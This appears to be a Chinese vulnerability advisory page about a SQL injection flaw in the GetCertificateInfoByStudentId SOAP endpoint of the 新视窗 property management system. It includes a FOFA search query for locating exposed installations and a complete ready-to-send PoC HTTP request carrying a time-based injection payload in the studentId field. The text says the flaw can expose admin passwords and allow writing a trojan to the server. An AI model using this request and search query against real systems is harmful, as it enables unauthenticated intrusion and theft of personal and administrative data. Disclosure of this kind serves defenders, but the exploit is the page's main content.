新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞

日期: 2024-06-11 | 影响软件: 新视窗新一代物业管理系统 | POC: 已公开

漏洞描述

新视窗物业管理系统属于专家型的物业管理软件，能够给物业公司内部管理提供全面的解决方案，具有房产管理、客户管理、租赁管理、仪表管理、财务收费、发票管理、合同管理、仓储管理、设施设备管理、客户服务管理、会员管理、人事管理、资产管理、日常办公、档案管理、企业网站、PDA客户服务等功能模块，能满足物业管理公司人事、财务、客服、工程、行政、质量等不同部门人员的工作要求。新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

PoC代码

## 新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞



新视窗新一代物业管理系统的XML Web services接囗GetCertifcatelnfoBvStudentld 实例处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如，管理员后台密码、站点的用户个人信息)之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。



## fofa



```

body="BPMSite/ClientSupport/OCXInstall.aspx"

```



## poc



```

POST /OfficeManagement/RegisterManager/Report/Training/Report/GetprintData.asmx HTTP/1.1

Host: your-ip

Content-Type: text/xml; charset=utf-8

Content-Length: length

SOAPAction: "http://tempuri.org/GetCertificateInfoByStudentId"

 

<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">

  <soap:Body>

    <GetCertificateInfoByStudentId xmlns="http://tempuri.org/">

      <studentId>1;WAITFOR DELAY '0:0:5'--</studentId>

    </GetCertificateInfoByStudentId>

  </soap:Body>

</soap:Envelope>

```



![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211840774.png)

漏洞描述

PoC代码

相关漏洞推荐